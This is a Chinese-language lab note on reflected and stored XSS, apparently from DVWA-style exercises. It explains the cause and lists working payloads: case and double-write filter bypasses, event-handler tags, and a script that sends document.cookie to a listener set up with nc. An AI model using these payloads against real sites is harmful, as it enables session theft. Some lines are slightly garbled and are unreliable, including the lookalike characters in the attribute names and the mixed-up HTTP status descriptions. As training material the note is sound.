Xss-reflected/stored跨站脚本分析(Cross site scripting)
基础知识
针对Dom - dochtml
Url概念:协议+网址/dns+端口+路径
XSS原理:对URL中的参数和对用户输入提交给web server的内容,没有进行充分的过滤。如果我们能够在web程序中对用户提交的URL中的参数,和提交的所有内容进行充分的过滤,将所有的不合法的参数和输入内容过滤掉,那么就不会导致“在用户的浏览器中执行攻击者自己定制的脚本”。
?name=<script>alert(document.cookie)</script>#
Php 会话id
Kali监听
Nc -nvlp 测试网络连通性
- ip地址、不用域名 v-详细输出 l-监听模式 p-端口号
192.168.184.195
新建标签
<script>var img=document.createElement("img");img.src="http://192.168.8.128:1234/?a="+escape(document.cookie);</script>#
Post 上传参数
Get获取参数
状态数值:
100
200 ok
400 服务器客户端问题
500 服务器客户端问题
实训过程
Reflected型
初级:直接写脚本语言
?name=<script>alert(document.cookie)</script>#
中级:大小写绕过、双写绕过
此处将<script>替换成了空格,所以可以大小写绕过或双写绕过
<scRipt>alert("666")</sCript>
<sc<script>ript>alert("666")</sc<script>ript>
高级:标签绕过
由源码可知,通配符过滤了/ script 而且无关大小写
<img src=1 οnerrοr=alert(document.cookie)>
<body οnlοad=alert(document.cookie)>
原理
stored型
看源代码,Name和message相比,防护性较低
其中:
stripslashes() 删除字符串中的反斜杠 /
mysqli_real_escape_string() 对特殊字符进行转意 \n \r \t
所以无法直接在前端上传脚本,用bp抓包,修改数据后,再发给服务器即可
初级:bp抓包,改数据,写脚本
中级:大小写绕过、双写绕过
<scRipt>alert("666")</sCript>
<sc<script>ript>alert("666")</sc<script>ript>
高级:标签绕过
<img src=1 οnerrοr=alert(document.cookie)>
<body οnlοad=alert(document.cookie)>
结果验证:均可弹出cookie窗口